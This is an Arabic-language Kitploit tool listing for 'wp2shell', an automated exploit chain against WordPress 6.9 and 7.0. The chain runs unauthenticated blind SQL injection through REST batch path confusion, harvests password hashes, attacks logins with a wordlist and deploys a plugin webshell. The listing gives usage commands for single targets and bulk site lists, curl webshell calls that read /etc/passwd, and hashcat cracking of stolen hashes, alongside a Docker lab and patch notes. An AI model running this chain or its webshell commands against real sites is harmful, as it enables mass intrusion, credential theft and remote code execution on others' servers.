Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp2shell — سلسلة استغلال آلية لـ CVE-2026-63030 / CVE-2026-60137 — حقن SQL أعمى غير مصادَق عليه عبر التباس مسار الدُفعات في REST لووردبريس. يستخرج تجزئات المستخدمين، يكسر بيانات الاعتماد، وينشر webshell. يدعم هدفًا واحدًا وقوائم مواقع مجمعة. لأغراض اختبار الأمان المصرح بها فقط. | Kitploit
أدوات/GitHubGitHub/0xwhoknows/wp2shell
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHub0xwhoknows/wp2shell

wp2shell

سلسلة استغلال آلية لـ CVE-2026-63030 / CVE-2026-60137 — حقن SQL أعمى غير مصادَق عليه عبر التباس مسار الدُفعات في REST لووردبريس. يستخرج تجزئات المستخدمين، يكسر بيانات الاعتماد، وينشر webshell. يدعم هدفًا واحدًا وقوائم مواقع مجمعة. لأغراض اختبار الأمان المصرح بها فقط.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

wp2shell

حقن SQL أعمى عبر الخلط في مسارات REST للدفعات في WordPress — سلسلة استغلال آلية.

CVE-2026-63030 / CVE-2026-60137

الإصدارات المتأثرةWordPress 6.9.0 – 6.9.4 و 7.0.0 – 7.0.1
الإصدار المُصلَحWordPress 6.9.5 / 7.0.2
نقطة الحقنحقن SQL عبر author__not_in من معامل author_exclude المخلّ بالتزامن
مصادقة مطلوبةلا (SQLi دون مصادقة)

لأغراض الاختبار الأمني المصرح به فقط.


كيف يعمل

نقطة نهاية الدفعات في REST API الخاصة بـ WordPress (/wp-json/batch/v1) تسمح بطلبات دفعات متداخلة. حمولة عدم مزامنة مزدوجة التداخل تُزيح المصفوفتين الداخليتين $matches / $validation، لتوجيه قيمة author_exclude مُصمَّمة بعناية إلى SQL الخاصة بـ author__not_in دون تعقيم. وهذا يوفّر حقن SQL أعمى (منطقي وزمني) دون مصادقة.

سلسلة الاستغلال — 4 مراحل:

root@kitploit:~
Phase 1  Vulnerability check     batch marker probe + optional SQL timing
Phase 2  Hash harvest            blind SQLi extracts wp_users (login + hash)
Phase 3  Authentication          wordlist attack via wp-login.php
Phase 4  Webshell deployment     plugin ZIP upload -> RCE verify

المتطلبات

  • Python 3.8+
  • aiohttp
  • colorama
root@kitploit:~
pip install aiohttp colorama

الاستخدام

هدف واحد

root@kitploit:~
python wp2shell.py http://target.com

قائمة مواقع (رابط واحد في كل سطر)

root@kitploit:~
python wp2shell.py sites.txt

قائمة مواقع + ملف كلمات مرور مخصّص

root@kitploit:~
python wp2shell.py sites.txt -p pass.txt

بيانات اعتماد معروفة (تخطّي قائمة الكلمات)

root@kitploit:~
python wp2shell.py http://target.com --user admin --password admin123

تأكيد SQLi عبر التوقيت

root@kitploit:~
python wp2shell.py http://target.com --confirm-sqli

بدون روابط دائمة جميلة (Pretty Permalinks)

root@kitploit:~
python wp2shell.py http://target.com --rest-route

عبر وكيل Burp

root@kitploit:~
python wp2shell.py http://target.com --proxy http://127.0.0.1:8080

الخيارات


ملفات الإخراج

الملفالمحتوى
creds.txthttp://target=>user:pass (نص صريح إذا تم كسرها، تجزئة إذا لم يتم)
webshell.txtرابط الويب شيل النشط
VULNERABLE.txtجميع الأهداف التي تأكدت إصابتها بالثغرة في المرحلة 1

جميع الملفات يُلحق بها — تتراكم النتائج عبر مرات التشغيل.

استخدام الويب شيل — أضِف ?cmd=COMMAND إلى الرابط الموجود في webshell.txt:

root@kitploit:~
# browser
http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id

# curl
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id"
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=cat+/etc/passwd"

الكسر دون اتصال

إذا لم تنجح قائمة الكلمات، يحتوي creds.txt على التجزئة المستخرجة:

root@kitploit:~
hashcat -m 400 creds.txt wordlist.txt

ثم أعد التشغيل بكلمة المرور المكسورة:

root@kitploit:~
python wp2shell.py http://target.com --user admin --password <plaintext>

مختبر محلي (Docker)

يُشغّل نسخة WordPress 7.0.1 قابلة للاستغلال لاختبار محلي آمن.

أول تشغيل — بناء وحدات التخزين وتثبيت WordPress:

root@kitploit:~
docker compose up -d db wordpress
docker compose run --rm wpcli

عمليات التشغيل اللاحقة:

root@kitploit:~
docker compose up -d db wordpress

الإيقاف:

root@kitploit:~
docker compose down

إعادة تعيين كاملة (تمسح جميع البيانات):

root@kitploit:~
docker compose down -v

تشغيل الاستغلال ضد المختبر:

root@kitploit:~
python wp2shell.py http://localhost:8080

التصحيح

قم بالتحديث إلى WordPress 6.9.5 أو 7.0.2. يتحقق الإصلاح من مسار الدفعات قبل إرسال الطلبات المتداخلة، مما يمنع عدم المزامنة الذي يكشف نقطة حقن SQL.


الجانب القانوني

للاستخدام على الأنظمة التي تملكها أو لديك تفويض كتابي صريح لاختبارها. الاستخدام غير المصرح به غير قانوني.

تنزيل الأداة
الخيارالافتراضيالوصف
target—رابط (http://target) أو مسار ملف قائمة المواقع
-p FILE—ملف قائمة كلمات المرور (كلمة واحدة في كل سطر)
--user—تخطَّ قائمة الكلمات واستخدم اسم المستخدم هذا
--password—تخطَّ قائمة الكلمات واستخدم كلمة المرور هذه
--confirm-sqlioffإرسال استقصاء توقيت SQL نشط بعد فحص العلامة
--rest-routeoffاستخدام /?rest_route=/batch/v1 (بدون روابط دائمة جميلة)
--sleep N3.0تأخير SLEEP() في SQL بالثواني
--samples N3أزواج عينات التوقيت لحساب الوسيط
--timeout N30.0مهلة طلب HTTP
--prefix PREFIXwp_بادئة جدول قاعدة البيانات
--proxy URL—وكيل HTTP/HTTPS
الرابطhttp://localhost:8080
المديرadmin / admin123
مضيف MySQLdb
مستخدم/كلمة مرور MySQLwpuser / wppass
قاعدة البياناتwordpress